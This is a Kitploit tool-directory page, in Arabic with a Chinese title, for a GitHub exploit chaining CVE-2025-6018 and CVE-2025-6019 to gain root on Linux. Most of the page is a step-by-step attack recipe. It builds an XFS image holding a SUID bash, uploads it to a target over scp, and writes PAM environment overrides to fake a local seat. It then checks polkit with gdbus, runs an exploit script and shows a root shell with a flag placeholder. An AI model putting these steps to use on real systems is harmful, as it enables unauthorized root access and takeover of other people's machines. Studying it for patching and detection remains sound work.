Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit — CVE-2025-6018 + CVE-2025-6019 权限提升漏洞利用 | Kitploit
أدوات/GitHubGitHub/muyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمراستغلال الملفات الثنائية
GitHubmuyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-6018 + CVE-2025-6019 权限提升漏洞利用

عرض المستودع
1214منذ 7 أشهرلم تتم المراجعة بعد

دليل تصعيد الامتيازات CVE-2025-6018 + CVE-2025-6019

中文

📋 خطوات الاستغلال السريعة

الخطوة 1: تجهيز صورة XFS (على الجهاز المحلي)

# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

الخطوة 2: رفع الملفات إلى الهدف

# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

الخطوة 3: تسجيل الدخول الأول - إعداد PAM

# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Critical: Logout (to activate PAM config)
exit

الخطوة 4: تسجيل الدخول الثاني - تنفيذ تصعيد الامتيازات

# Re-login via SSH (PAM config now active)
ssh [email protected]

# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Execute privilege escalation script
bash exp.sh

✅ مؤشرات النجاح

إذا نجح الاستغلال، يجب أن ترى:

✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ ROOT FLAG                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 استكشاف الأخطاء وإصلاحها

المشكلةالحل
CanReboot يُرجع ('no',)تأكد من تسجيل الخروج ثم العودة (الخطوة 3)
خطأ Not authorizedتحقق من أن محتوى ~/.pam_environment صحيح
عدم العثور على SUID bashأعد رفع xfs.image وتحقق من تعيين بِت SUID

📌 نقاط أساسية

  • ✅ يجب تسجيل الخروج ثم إعادة تسجيل الدخول: إعداد PAM لا يسري إلا في الجلسات الجديدة
  • ✅ تحقق من CanReboot: تأكد من أنه يُرجع ('yes',) قبل تشغيل السكربت
  • ✅ استخدم تسجيل دخول SSH: لا تستخدم أسلوب التنفيذ ssh -t user@host "cmd"

🐱 الحارس القط

إذا فشل الأمر، تأكد من تنفيذ كل خطوة بدقة وبالترتيب!

تنزيل الأداة